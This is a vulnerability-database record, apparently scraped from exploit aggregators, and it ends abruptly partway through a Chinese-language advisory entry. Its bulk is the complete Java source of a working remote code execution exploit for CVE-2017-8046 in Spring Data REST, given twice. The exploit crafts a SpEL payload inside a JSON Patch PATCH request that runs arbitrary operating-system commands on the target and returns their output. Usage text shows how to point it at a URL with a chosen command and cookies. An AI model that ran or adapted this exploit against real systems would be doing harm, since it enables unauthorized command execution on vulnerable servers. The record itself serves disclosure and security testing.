"PACKETSTORM:146817", "href": "https://packetstormsecurity.com/files/146817/Spring-Data-REST-PATCH-Request-Remote-Code-Execution.html", "sourceData": "`// Exploit Title: RCE in PATCH requests in Spring Data REST \n// Date: 2018-03-10 \n// Exploit Author: Antonio Francesco Sardella \n// Vendor Homepage: https://pivotal.io/ \n// Software Link: https://projects.spring.io/spring-data-rest/ \n// Version: Spring Data REST versions prior to 2.6.9 (Ingalls SR9), 3.0.1 (Kay SR1) \n// Tested on: 'Microsoft Windows 7' and 'Xubuntu 17.10.1' with 'spring-boot-starter-data-rest' version '1.5.6.RELEASE' \n// CVE: CVE-2017-8046 \n// Category: Webapps \n// Repository: https://github.com/m3ssap0/spring-break_cve-2017-8046 \n// Example Vulnerable Application: https://github.com/m3ssap0/SpringBreakVulnerableApp \n// Vulnerability discovered and reported by: Man Yue Mo from Semmle and lgtm.com \n \npackage com.afs.exploit.spring; \n \nimport java.io.BufferedReader; \nimport java.io.IOException; \nimport java.io.InputStreamReader; \nimport java.net.URI; \nimport java.net.URISyntaxException; \n \nimport org.apache.http.HttpResponse; \nimport org.apache.http.client.HttpClient; \nimport org.apache.http.client.methods.HttpPatch; \nimport org.apache.http.entity.StringEntity; \nimport org.apache.http.impl.client.HttpClientBuilder; \n \n/** \n* This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046). \n* This software is written to have as less external dependencies as possible. \n* DISCLAIMER: This tool is intended for security engineers and appsec guys for security assessments. Please \n* use this tool responsibly. I do not take responsibility for the way in which any one uses this application. \n* I am NOT responsible for any damages caused or any crimes committed by using this tool. \n* .................. \n* . CVE-ID ........: CVE-2017-8046 \n* . Link ..........: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046 \n* . Description ...: Malicious PATCH requests submitted to spring-data-rest servers in Pivotal Spring Data REST \n* .................. versions prior to 2.5.12, 2.6.7, 3.0 RC3, Spring Boot versions prior to 2.0.0M4, and Spring \n* .................. Data release trains prior to Kay-RC3 can use specially crafted JSON data to run arbitrary \n* .................. Java code. \n* .................. \n* \n* @author Antonio Francesco Sardella \n*/ \npublic class SpringBreakCve20178046 { \n \n/** \n* Version string. \n*/ \nprivate static final String VERSION = \"v1.0 (2018-03-10)\"; \n \n/** \n* The JSON Patch object. \n*/ \nprivate static String JSON_PATCH_OBJECT = \"[{ \\\"op\\\" : \\\"replace\\\", \\\"path\\\" : \\\"%s\\\", \\\"value\\\" : \\\"pwned\\\" }]\"; \n \n/** \n* This is a way to bypass the split and 'replace' \n* logic performed by the framework on slashes. \n*/ \nprivate static String SLASH = \"T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F))\"; \n \n/** \n* Used to encode chars. \n*/ \nprivate static String CHAR_ENCODING = \"T(java.lang.Character).toChars(%d)[0]\"; \n \n/** \n* Malicious payload. \n*/ \nprivate static String PAYLOAD; \n \n/** \n* Malicious payload initialization. \n*/ \nstatic { \nPAYLOAD = \"T(org.springframework.util.StreamUtils).copy(\"; \nPAYLOAD += \"T(java.lang.Runtime).getRuntime().exec(\"; \nPAYLOAD += \"(\"; \nPAYLOAD += \"T(java.lang.System).getProperty(\\\\\\\"os.name\\\\\\\").toLowerCase().contains(\\\\\\\"win\\\\\\\")\"; \nPAYLOAD += \"?\"; \nPAYLOAD += \"\\\\\\\"cmd \\\\\\\"+\" + SLASH + \"+\\\\\\\"c \\\\\\\"\"; \nPAYLOAD += \":\"; \nPAYLOAD += \"\\\\\\\"\\\\\\\"\"; \nPAYLOAD += \")+\"; \nPAYLOAD += \"%s\"; // The encoded command will be placed here. \nPAYLOAD += \").getInputStream()\"; \nPAYLOAD += \",\"; \nPAYLOAD += \"T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes()\"; \nPAYLOAD += \".getResponse().getOutputStream()\"; \nPAYLOAD += \").x\"; \n} \n \n/** \n* Error cause string that can be used to \"clean the response.\" \n*/ \nprivate static String ERROR_CAUSE = \"{\\\"cause\"; \n \n/** \n* The target URL. \n*/ \nprivate URI url; \n \n/** \n* The command that will be executed on the remote machine. \n*/ \nprivate String command; \n \n/** \n* Cookies that will be passed. \n*/ \nprivate String cookies; \n \n/** \n* Flag used to remove error messages in output due to \n* the usage of the exploit. It could hide error messages \n* if the request fails for other reasons. \n*/ \nprivate boolean cleanResponse; \n \n/** \n* Verbosity flag. \n*/ \nprivate boolean verbose; \n \n/** \n* Default constructor. \n*/ \npublic SpringBreakCve20178046() { \nthis.verbose = false; \nthis.cleanResponse = false; \n} \n \n/** \n* Performs the exploit. \n* \n* @throws IOException \n* If something bad occurs during HTTP GET. \n*/ \npublic void exploit() throws IOException { \ncheckInput(); \nprintInput(); \nString payload = preparePayload(); \nString response = httpPatch(payload); \nprintOutput(response); \n} \n \n/** \n* Checks the input. \n*/ \nprivate void checkInput() { \nif (this.url == null) { \nthrow new IllegalArgumentException(\"URL must be passed.\"); \n} \n \nif (isEmpty(this.command)) { \nthrow new IllegalArgumentException(\"Command must be passed.\"); \n} \n} \n \n/** \n* Prints input if verbose flag is true. \n*/ \nprivate void printInput() { \nif (isVerbose()) { \nSystem.out.println(\"[*] Target URL ........: \" + this.url); \nSystem.out.println(\"[*] Command ...........: \" + this.command); \nSystem.out.println(\"[*] Cookies ...........: \" + (isEmpty(this.cookies) ? \"(no cookies)\" : this.cookies)); \n} \n} \n \n/** \n* Prepares the payload. \n* \n* @return The malicious payload that will be injected. \n*/ \nprivate String preparePayload() { \nSystem.out.println(\"[*] Preparing payload.\"); \n \nString command = encodingCommand(); // Encoding inserted command. \nString payload = String.format(PAYLOAD, command); // Preparing Java payload. \npayload = String.format(JSON_PATCH_OBJECT, payload); // Placing payload into JSON Patch object. \n \nif (isVerbose()) { \nSystem.out.println(\"[*] Payload ...........: \" + payload); \n} \n \nreturn payload; \n} \n \n/** \n* Encodes the inserted command. \n* PROS: No problems in interpreting things. \n* CONS: Payload too long. \n* \n* @return The encoded command. \n*/ \nprivate String encodingCommand() { \nStringBuffer encodedCommand = new StringBuffer(\"T(java.lang.String).valueOf(new char[]{\"); \n \nint commandLength = this.command.length(); \nfor (int i = 0; i < commandLength; i++) { \nencodedCommand.append(String.format(CHAR_ENCODING, (int) this.command.charAt(i))); \nif (i + 1 < commandLength) { \nencodedCommand.append(\",\"); \n} \n} \n \nencodedCommand.append(\"})\"); \n \nif (isVerbose()) { \nSystem.out.println(\"[*] Encoded command ...: \" + encodedCommand.toString()); \n} \n \nreturn encodedCommand.toString(); \n} \n \n/** \n* HTTP PATCH operation on the target passing the malicious payload. \n* \n* @param payload \n* The malicious payload. \n* @return The response as a string. \n* @throws IOException \n* If something bad occurs during HTTP GET. \n*/ \nprivate String httpPatch(String payload) throws IOException { \nSystem.out.println(\"[*] Sending payload.\"); \n \n// Preparing PATCH operation. \nHttpClient client = HttpClientBuilder.create().build(); \nHttpPatch patch = new HttpPatch(this.url); \npatch.setHeader(\"User-Agent\", \"Mozilla/5.0\"); \npatch.setHeader(\"Accept-Language\", \"en-US,en;q=0.5\"); \npatch.setHeader(\"Content-Type\", \"application/json-patch+json\"); // This is a JSON Patch. \nif (!isEmpty(this.cookies)) { \npatch.setHeader(\"Cookie\", this.cookies); \n} \npatch.setEntity(new StringEntity(payload)); \n \n// Response string. \nStringBuffer response = new StringBuffer(); \n \n// Executing PATCH operation. \nHttpResponse httpResponse = client.execute(patch); \nif (httpResponse != null) { \n \n// Reading response code. \nif (httpResponse.getStatusLine() != null) { \nint responseCode = httpResponse.getStatusLine().getStatusCode(); \nSystem.out.println(\"[*] HTTP \" + responseCode); \n} else { \nSystem.out.println(\"[!] HTTP response code can't be read.\"); \n} \n \n// Reading response content. \nif (httpResponse.getEntity() != null && httpResponse.getEntity().getContent() != null) { \nBufferedReader in = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent())); \nString inputLine; \n \nwhile ((inputLine = in.readLine()) != null) { \nresponse.append(inputLine); \nresponse.append(System.getProperty(\"line.separator\")); \n} \nin.close(); \n} else { \nSystem.out.println(\"[!] HTTP response content can't be read.\"); \n} \n \n} else { \nSystem.out.println(\"[!] HTTP response is null.\"); \n} \n \nreturn response.toString(); \n} \n \n/** \n* Prints output. \n* \n* @param response \n* Response that will be printed. \n*/ \nprivate void printOutput(String response) { \nif (!isEmpty(response)) { \nSystem.out.println(\"[*] vvv Response vvv\"); \n \n// Cleaning response (if possible). \nif (isCleanResponse() && response.contains(ERROR_CAUSE)) { \nString cleanedResponse = response.split(\"\\\\\" + ERROR_CAUSE)[0]; \nSystem.out.println(cleanedResponse); \n} else { \nSystem.out.println(response); \n} \n \nSystem.out.println(\"[*] ^^^ ======== ^^^\"); \n} \n} \n \n/** \n* Checks if an input string is null/empty or not. \n* \n* @param input \n* The input string to check. \n* @return True if the string is null or empty, false otherwise. \n*/ \nprivate boolean isEmpty(String input) { \nboolean isEmpty; \n \nif (input == null || input.trim().length() < 1) { \nisEmpty = true; \n} else { \nisEmpty = false; \n} \n \nreturn isEmpty; \n} \n \n/* Getters and setters. */ \n \npublic boolean isVerbose() { \nreturn verbose; \n} \n \npublic void setVerbose(boolean verbose) { \nthis.verbose = verbose; \n} \n \npublic void setUrl(String url) throws URISyntaxException { \nif (isEmpty(url)) { \nthrow new IllegalArgumentException(\"URL must be not null and not empty.\"); \n} \n \nthis.url = new URI(url.trim()); \n} \n \npublic void setCommand(String command) { \nif (isEmpty(command)) { \nthrow new IllegalArgumentException(\"Command must be not null and not empty.\"); \n} \n \nthis.command = command.trim(); \n} \n \npublic void setCookies(String cookies) { \nif (cookies != null) { \ncookies = cookies.trim(); \n} \n \nthis.cookies = cookies; \n} \n \npublic boolean isCleanResponse() { \nreturn cleanResponse; \n} \n \npublic void setCleanResponse(boolean cleanResponse) { \nthis.cleanResponse = cleanResponse; \n} \n \n/** \n* Shows the program help. \n*/ \npublic static final void help() { \nSystem.out.println(\"Usage:\"); \nSystem.out.println(\" java -jar spring-break_cve-2017-8046.jar [options]\"); \nSystem.out.println(\"Description:\"); \nSystem.out.println(\" Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046).\"); \nSystem.out.println(\"Options:\"); \nSystem.out.println(\" -h, --help\"); \nSystem.out.println(\" Prints this help and exits.\"); \nSystem.out.println(\" -u, --url [target_URL]\"); \nSystem.out.println(\" The target URL where the exploit will be performed.\"); \nSystem.out.println(\" You have to choose an existent resource.\"); \nSystem.out.println(\" -cmd, --command [command_to_execute]\"); \nSystem.out.println(\" The command that will be executed on the remote machine.\"); \nSystem.out.println(\" --cookies [cookies]\"); \nSystem.out.println(\" Optional. Cookies passed into the request, e.g. authentication cookies.\"); \nSystem.out.println(\" --clean\"); \nSystem.out.println(\" Optional. Removes error messages in output due to the usage of the\"); \nSystem.out.println(\" exploit. It could hide error messages if the request fails for other reasons.\"); \nSystem.out.println(\" -v, --verbose\"); \nSystem.out.println(\" Optional. Increase verbosity.\"); \n} \n \n/** \n* Main method. \n* \n* @param args \n* Input arguments \n*/ \npublic static void main(String[] args) { \ntry { \nSystem.out.println(\"'Spring Break' RCE (CVE-2017-8046) - \" + VERSION); \nSpringBreakCve20178046 o = new SpringBreakCve20178046(); \n \nif (args.length > 0) { \nfor (int i = 0; i < args.length; i++) { \n \nString p = args[i]; \n \nif ((\"-h\".equals(p) || \"--help\".equals(p)) && i == 0) { \nSpringBreakCve20178046.help(); \nreturn; \n} else if (\"-u\".equals(p) || \"--url\".equals(p)) { \n \nif (i + 1 > args.length - 1) { \nthrow new IllegalArgumentException(\"URL must be passed.\"); \n} \no.setUrl(args[++i]); \n \n} else if (\"-cmd\".equals(p) || \"--command\".equals(p)) { \n \nif (i + 1 > args.length - 1) { \nthrow new IllegalArgumentException(\"Command must be passed.\"); \n} \no.setCommand(args[++i]); \n \n} else if (\"--cookies\".equals(p)) { \n \nif (i + 1 > args.length - 1) { \nthrow new IllegalArgumentException(\"Cookies must be passed, if specified.\"); \n} \no.setCookies(args[++i]); \n \n} else if (\"--clean\".equals(p)) { \no.setCleanResponse(true); \n} else if (\"-v\".equals(p) || \"--verbose\".equals(p)) { \no.setVerbose(true); \n} \n \n} \n \n// Performing the exploit. \no.exploit(); \n \n} else { // Wrong number of arguments. \nSpringBreakCve20178046.help(); \nreturn; \n} \n \n} catch (URISyntaxException use) { \nSystem.out.println(\"[!] Input error (URI syntax exception): \" + use.getMessage()); \n} catch (IllegalArgumentException iae) { \nSystem.out.println(\"[!] Input error (illegal argument): \" + iae.getMessage()); \n} catch (Exception e) { \nSystem.out.println(\"[!] Unexpected exception: \" + e.getMessage()); \ne.printStackTrace(); \n} \n} \n \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/146817/springdatarest-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-04T23:36:09", "description": "Exploit for java platform in category web applications", "cvss3": {}, "published": "2018-03-16T00:00:00", "type": "zdt", "title": "Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution Ex", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8046"], "modified": "2018-03-16T00:00:00", "id": "1337DAY-ID-29996", "href": "https://0day.today/exploit/description/29996", "sourceData": "// Exploit Title: RCE in PATCH requests in Spring Data REST\r\n// Date: 2018-03-10\r\n// Exploit Author: Antonio Francesco Sardella\r\n// Vendor Homepage: https://pivotal.io/\r\n// Software Link: https://projects.spring.io/spring-data-rest/\r\n// Version: Spring Data REST versions prior to 2.6.9 (Ingalls SR9), 3.0.1 (Kay SR1)\r\n// Tested on: 'Microsoft Windows 7' and 'Xubuntu 17.10.1' with 'spring-boot-starter-data-rest' version '1.5.6.RELEASE'\r\n// CVE: CVE-2017-8046\r\n// Category: Webapps\r\n// Repository: https://github.com/m3ssap0/spring-break_cve-2017-8046\r\n// Example Vulnerable Application: https://github.com/m3ssap0/SpringBreakVulnerableApp\r\n// Vulnerability discovered and reported by: Man Yue Mo from Semmle and lgtm.com\r\n \r\npackage com.afs.exploit.spring;\r\n \r\nimport java.io.BufferedReader;\r\nimport java.io.IOException;\r\nimport java.io.InputStreamReader;\r\nimport java.net.URI;\r\nimport java.net.URISyntaxException;\r\n \r\nimport org.apache.http.HttpResponse;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.methods.HttpPatch;\r\nimport org.apache.http.entity.StringEntity;\r\nimport org.apache.http.impl.client.HttpClientBuilder;\r\n \r\n/**\r\n * This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).\r\n * This software is written to have as less external dependencies as possible.\r\n * DISCLAIMER: This tool is intended for security engineers and appsec guys for security assessments. Please\r\n * use this tool responsibly. I do not take responsibility for the way in which any one uses this application.\r\n * I am NOT responsible for any damages caused or any crimes committed by using this tool.\r\n * ..................\r\n * . CVE-ID ........: CVE-2017-8046\r\n * . Link ..........: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046\r\n * . Description ...: Malicious PATCH requests submitted to spring-data-rest servers in Pivotal Spring Data REST\r\n * .................. versions prior to 2.5.12, 2.6.7, 3.0 RC3, Spring Boot versions prior to 2.0.0M4, and Spring\r\n * .................. Data release trains prior to Kay-RC3 can use specially crafted JSON data to run arbitrary\r\n * .................. Java code.\r\n * ..................\r\n * \r\n * @author Antonio Francesco Sardella\r\n */\r\npublic class SpringBreakCve20178046 {\r\n \r\n /**\r\n * Version string.\r\n */\r\n private static final String VERSION = \"v1.0 (2018-03-10)\";\r\n \r\n /**\r\n * The JSON Patch object.\r\n */\r\n private static String JSON_PATCH_OBJECT = \"[{ \\\"op\\\" : \\\"replace\\\", \\\"path\\\" : \\\"%s\\\", \\\"value\\\" : \\\"pwned\\\" }]\";\r\n \r\n /**\r\n * This is a way to bypass the split and 'replace'\r\n * logic performed by the framework on slashes.\r\n */\r\n private static String SLASH = \"T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F))\";\r\n \r\n /**\r\n * Used to encode chars.\r\n */\r\n private static String CHAR_ENCODING = \"T(java.lang.Character).toChars(%d)[0]\";\r\n \r\n /**\r\n * Malicious payload.\r\n */\r\n private static String PAYLOAD;\r\n \r\n /**\r\n * Malicious payload initialization.\r\n */\r\n static {\r\n PAYLOAD = \"T(org.springframework.util.StreamUtils).copy(\";\r\n PAYLOAD += \"T(java.lang.Runtime).getRuntime().exec(\";\r\n PAYLOAD += \"(\";\r\n PAYLOAD += \"T(java.lang.System).getProperty(\\\\\\\"os.name\\\\\\\").toLowerCase().contains(\\\\\\\"win\\\\\\\")\";\r\n PAYLOAD += \"?\";\r\n PAYLOAD += \"\\\\\\\"cmd \\\\\\\"+\" + SLASH + \"+\\\\\\\"c \\\\\\\"\";\r\n PAYLOAD += \":\";\r\n PAYLOAD += \"\\\\\\\"\\\\\\\"\";\r\n PAYLOAD += \")+\";\r\n PAYLOAD += \"%s\"; // The encoded command will be placed here.\r\n PAYLOAD += \").getInputStream()\";\r\n PAYLOAD += \",\";\r\n PAYLOAD += \"T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes()\";\r\n PAYLOAD += \".getResponse().getOutputStream()\";\r\n PAYLOAD += \").x\";\r\n }\r\n \r\n /**\r\n * Error cause string that can be used to \"clean the response.\"\r\n */\r\n private static String ERROR_CAUSE = \"{\\\"cause\";\r\n \r\n /**\r\n * The target URL.\r\n */\r\n private URI url;\r\n \r\n /**\r\n * The command that will be executed on the remote machine.\r\n */\r\n private String command;\r\n \r\n /**\r\n * Cookies that will be passed.\r\n */\r\n private String cookies;\r\n \r\n /**\r\n * Flag used to remove error messages in output due to\r\n * the usage of the exploit. It could hide error messages\r\n * if the request fails for other reasons.\r\n */\r\n private boolean cleanResponse;\r\n \r\n /**\r\n * Verbosity flag.\r\n */\r\n private boolean verbose;\r\n \r\n /**\r\n * Default constructor.\r\n */\r\n public SpringBreakCve20178046() {\r\n this.verbose = false;\r\n this.cleanResponse = false;\r\n }\r\n \r\n /**\r\n * Performs the exploit.\r\n * \r\n * @throws IOException\r\n * If something bad occurs during HTTP GET.\r\n */\r\n public void exploit() throws IOException {\r\n checkInput();\r\n printInput();\r\n String payload = preparePayload();\r\n String response = httpPatch(payload);\r\n printOutput(response);\r\n }\r\n \r\n /**\r\n * Checks the input.\r\n */\r\n private void checkInput() {\r\n if (this.url == null) {\r\n throw new IllegalArgumentException(\"URL must be passed.\");\r\n }\r\n \r\n if (isEmpty(this.command)) {\r\n throw new IllegalArgumentException(\"Command must be passed.\");\r\n }\r\n }\r\n \r\n /**\r\n * Prints input if verbose flag is true.\r\n */\r\n private void printInput() {\r\n if (isVerbose()) {\r\n System.out.println(\"[*] Target URL ........: \" + this.url);\r\n System.out.println(\"[*] Command ...........: \" + this.command);\r\n System.out.println(\"[*] Cookies ...........: \" + (isEmpty(this.cookies) ? \"(no cookies)\" : this.cookies));\r\n }\r\n }\r\n \r\n /**\r\n * Prepares the payload.\r\n * \r\n * @return The malicious payload that will be injected.\r\n */\r\n private String preparePayload() {\r\n System.out.println(\"[*] Preparing payload.\");\r\n \r\n String command = encodingCommand(); // Encoding inserted command.\r\n String payload = String.format(PAYLOAD, command); // Preparing Java payload.\r\n payload = String.format(JSON_PATCH_OBJECT, payload); // Placing payload into JSON Patch object.\r\n \r\n if (isVerbose()) {\r\n System.out.println(\"[*] Payload ...........: \" + payload);\r\n }\r\n \r\n return payload;\r\n }\r\n \r\n /**\r\n * Encodes the inserted command.\r\n * PROS: No problems in interpreting things.\r\n * CONS: Payload too long.\r\n * \r\n * @return The encoded command.\r\n */\r\n private String encodingCommand() {\r\n StringBuffer encodedCommand = new StringBuffer(\"T(java.lang.String).valueOf(new char[]{\");\r\n \r\n int commandLength = this.command.length();\r\n for (int i = 0; i < commandLength; i++) {\r\n encodedCommand.append(String.format(CHAR_ENCODING, (int) this.command.charAt(i)));\r\n if (i + 1 < commandLength) {\r\n encodedCommand.append(\",\");\r\n }\r\n }\r\n \r\n encodedCommand.append(\"})\");\r\n \r\n if (isVerbose()) {\r\n System.out.println(\"[*] Encoded command ...: \" + encodedCommand.toString());\r\n }\r\n \r\n return encodedCommand.toString();\r\n }\r\n \r\n /**\r\n * HTTP PATCH operation on the target passing the malicious payload.\r\n * \r\n * @param payload\r\n * The malicious payload.\r\n * @return The response as a string.\r\n * @throws IOException\r\n * If something bad occurs during HTTP GET.\r\n */\r\n private String httpPatch(String payload) throws IOException {\r\n System.out.println(\"[*] Sending payload.\");\r\n \r\n // Preparing PATCH operation.\r\n HttpClient client = HttpClientBuilder.create().build();\r\n HttpPatch patch = new HttpPatch(this.url);\r\n patch.setHeader(\"User-Agent\", \"Mozilla/5.0\");\r\n patch.setHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n patch.setHeader(\"Content-Type\", \"application/json-patch+json\"); // This is a JSON Patch.\r\n if (!isEmpty(this.cookies)) {\r\n patch.setHeader(\"Cookie\", this.cookies);\r\n }\r\n patch.setEntity(new StringEntity(payload));\r\n \r\n // Response string.\r\n StringBuffer response = new StringBuffer();\r\n \r\n // Executing PATCH operation.\r\n HttpResponse httpResponse = client.execute(patch);\r\n if (httpResponse != null) {\r\n \r\n // Reading response code.\r\n if (httpResponse.getStatusLine() != null) {\r\n int responseCode = httpResponse.getStatusLine().getStatusCode();\r\n System.out.println(\"[*] HTTP \" + responseCode);\r\n } else {\r\n System.out.println(\"[!] HTTP response code can't be read.\");\r\n }\r\n \r\n // Reading response content.\r\n if (httpResponse.getEntity() != null && httpResponse.getEntity().getContent() != null) {\r\n BufferedReader in = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent()));\r\n String inputLine;\r\n \r\n while ((inputLine = in.readLine()) != null) {\r\n response.append(inputLine);\r\n response.append(System.getProperty(\"line.separator\"));\r\n }\r\n in.close();\r\n } else {\r\n System.out.println(\"[!] HTTP response content can't be read.\");\r\n }\r\n \r\n } else {\r\n System.out.println(\"[!] HTTP response is null.\");\r\n }\r\n \r\n return response.toString();\r\n }\r\n \r\n /**\r\n * Prints output.\r\n * \r\n * @param response\r\n * Response that will be printed.\r\n */\r\n private void printOutput(String response) {\r\n if (!isEmpty(response)) {\r\n System.out.println(\"[*] vvv Response vvv\");\r\n \r\n // Cleaning response (if possible).\r\n if (isCleanResponse() && response.contains(ERROR_CAUSE)) {\r\n String cleanedResponse = response.split(\"\\\\\" + ERROR_CAUSE)[0];\r\n System.out.println(cleanedResponse);\r\n } else {\r\n System.out.println(response);\r\n }\r\n \r\n System.out.println(\"[*] ^^^ ======== ^^^\");\r\n }\r\n }\r\n \r\n /**\r\n * Checks if an input string is null/empty or not.\r\n * \r\n * @param input\r\n * The input string to check.\r\n * @return True if the string is null or empty, false otherwise.\r\n */\r\n private boolean isEmpty(String input) {\r\n boolean isEmpty;\r\n \r\n if (input == null || input.trim().length() < 1) {\r\n isEmpty = true;\r\n } else {\r\n isEmpty = false;\r\n }\r\n \r\n return isEmpty;\r\n }\r\n \r\n /* Getters and setters. */\r\n \r\n public boolean isVerbose() {\r\n return verbose;\r\n }\r\n \r\n public void setVerbose(boolean verbose) {\r\n this.verbose = verbose;\r\n }\r\n \r\n public void setUrl(String url) throws URISyntaxException {\r\n if (isEmpty(url)) {\r\n throw new IllegalArgumentException(\"URL must be not null and not empty.\");\r\n }\r\n \r\n this.url = new URI(url.trim());\r\n }\r\n \r\n public void setCommand(String command) {\r\n if (isEmpty(command)) {\r\n throw new IllegalArgumentException(\"Command must be not null and not empty.\");\r\n }\r\n \r\n this.command = command.trim();\r\n }\r\n \r\n public void setCookies(String cookies) {\r\n if (cookies != null) {\r\n cookies = cookies.trim();\r\n }\r\n \r\n this.cookies = cookies;\r\n }\r\n \r\n public boolean isCleanResponse() {\r\n return cleanResponse;\r\n }\r\n \r\n public void setCleanResponse(boolean cleanResponse) {\r\n this.cleanResponse = cleanResponse;\r\n }\r\n \r\n /**\r\n * Shows the program help.\r\n */\r\n public static final void help() {\r\n System.out.println(\"Usage:\");\r\n System.out.println(\" java -jar spring-break_cve-2017-8046.jar [options]\");\r\n System.out.println(\"Description:\");\r\n System.out.println(\" Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046).\");\r\n System.out.println(\"Options:\");\r\n System.out.println(\" -h, --help\");\r\n System.out.println(\" Prints this help and exits.\");\r\n System.out.println(\" -u, --url [target_URL]\");\r\n System.out.println(\" The target URL where the exploit will be performed.\");\r\n System.out.println(\" You have to choose an existent resource.\");\r\n System.out.println(\" -cmd, --command [command_to_execute]\");\r\n System.out.println(\" The command that will be executed on the remote machine.\");\r\n System.out.println(\" --cookies [cookies]\");\r\n System.out.println(\" Optional. Cookies passed into the request, e.g. authentication cookies.\");\r\n System.out.println(\" --clean\");\r\n System.out.println(\" Optional. Removes error messages in output due to the usage of the\");\r\n System.out.println(\" exploit. It could hide error messages if the request fails for other reasons.\");\r\n System.out.println(\" -v, --verbose\");\r\n System.out.println(\" Optional. Increase verbosity.\");\r\n }\r\n \r\n /**\r\n * Main method.\r\n * \r\n * @param args\r\n * Input arguments\r\n */\r\n public static void main(String[] args) {\r\n try {\r\n System.out.println(\"'Spring Break' RCE (CVE-2017-8046) - \" + VERSION);\r\n SpringBreakCve20178046 o = new SpringBreakCve20178046();\r\n \r\n if (args.length > 0) {\r\n for (int i = 0; i < args.length; i++) {\r\n \r\n String p = args[i];\r\n \r\n if ((\"-h\".equals(p) || \"--help\".equals(p)) && i == 0) {\r\n SpringBreakCve20178046.help();\r\n return;\r\n } else if (\"-u\".equals(p) || \"--url\".equals(p)) {\r\n \r\n if (i + 1 > args.length - 1) {\r\n throw new IllegalArgumentException(\"URL must be passed.\");\r\n }\r\n o.setUrl(args[++i]);\r\n \r\n } else if (\"-cmd\".equals(p) || \"--command\".equals(p)) {\r\n \r\n if (i + 1 > args.length - 1) {\r\n throw new IllegalArgumentException(\"Command must be passed.\");\r\n }\r\n o.setCommand(args[++i]);\r\n \r\n } else if (\"--cookies\".equals(p)) {\r\n \r\n if (i + 1 > args.length - 1) {\r\n throw new IllegalArgumentException(\"Cookies must be passed, if specified.\");\r\n }\r\n o.setCookies(args[++i]);\r\n \r\n } else if (\"--clean\".equals(p)) {\r\n o.setCleanResponse(true);\r\n } else if (\"-v\".equals(p) || \"--verbose\".equals(p)) {\r\n o.setVerbose(true);\r\n }\r\n \r\n }\r\n \r\n // Performing the exploit.\r\n o.exploit();\r\n \r\n } else { // Wrong number of arguments.\r\n SpringBreakCve20178046.help();\r\n return;\r\n }\r\n \r\n } catch (URISyntaxException use) {\r\n System.out.println(\"[!] Input error (URI syntax exception): \" + use.getMessage());\r\n } catch (IllegalArgumentException iae) {\r\n System.out.println(\"[!] Input error (illegal argument): \" + iae.getMessage());\r\n } catch (Exception e) {\r\n System.out.println(\"[!] Unexpected exception: \" + e.getMessage());\r\n e.printStackTrace();\r\n }\r\n }\r\n \r\n}\n\n# 0day.today [2018-04-04] #", "sourceHref": "https://0day.today/exploit/29996", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2018-06-26T22:15:35", "description": "### \u6f0f\u6d1e\u63cf\u8ff0\r\n\u6f0f\u6d1e\u63cf\u8ff0\r\nSpring Data Rest \u5728\u5904\u7406 PATCH \u8bf7\u6c42\u65f6\u5b58\u5728RCE\u9ad8\u5371\u6f0f\u6d1e, \u53ef\u4ee5\u4f7f\u7528\u624b\u5de5\u6784\u9020\u7684JSON\u6570\u636e\u6784\u9020\u6076\u610fPATCH\u8bf7\u6c42\u63d0\u4ea4\u81f3spring-data-rest\u670d\u52a1\u5668\uff0c\u4f7f\u5f97\u670d\u52a1\u5668\u8fd0\u884c\u6076\u610fJAVA\u4ee3\u7801\u3002Spring Data Rest\u9879\u76ee\u7684\u76ee\u6807\u662f\u63d0\u4f9b\u4e00\u79cd\u7075\u6d3b\u7684\u3001\u53ef\u914d\u7f6e\u7684\u673a\u5236\uff0c\u7f16\u5199\u51fa\u53ef\u4ee5\u5bf9\u5916\u66b4\u9732\u51faHTTP\u534f\u8bae\u7684\u7b80\u5355\u670d\u52a1\u3002\r\n\r\nGit\u5730\u5740: https://github.com/spring-projects/spring-data-rest\r\n\r\n* \u6f0f\u6d1e\u6765\u6e90: https://pivotal.io/security/cve-2017-8046\r\n* \u5f71\u54cd\u7248\u672c\uff1a\r\n\t* Spring Data REST versions 2.5.12, 2.6.7, 3.0 RC3\u4e4b\u524d\u7684\u7248\u672c\r\n\t* Spring Boot versions 2.0.0M4 \u4e4b\u524d\u7684\u7248\u672c\r\n\t* Spring Data release trains Kay-RC3 \u4e4b\u524d\u7684\u7248\u672c\r\n\r\n\u6f0f\u6d1e\u53d1\u73b0\u8005\r\n\r\nThis vulnerability was responsibly reported by Man Yue Mo from Semmle and\r\nlgtm.com.\u5907\u6ce8: Semmle\u662f\u4e00\u5bb6\u63d0\u4f9b\u4ee3\u7801\u5ba1\u8ba1\u548c\u5206\u6790\u7684\u4fe1\u606f\u670d\u52a1\u516c\u53f8\uff0c\u5b83\u6700\u4e3a\u51fa\u540d\u7684\u4e00\u6b3e\u4ea7\u54c1\u4e3a\u4e3aSemmleCode\u3002SemmleCode\u662f\u4e00\u79cd\u9759\u6001\u8f6f\u4ef6\u5206\u6790\u5305\uff0c\u53ef\u7528\u4e8e\u67e5\u627e\u7f16\u7a0bbug\u6a21\u5f0f\u3001\u8ba1\u7b97\u8f6f\u4ef6\u5ea6\u91cf\uff0c\u4ee5\u53ca\u6267\u884c\u7f16\u7801\u7ea6\u5b9a\u3002\r\n\r\n\r\n\r\n### 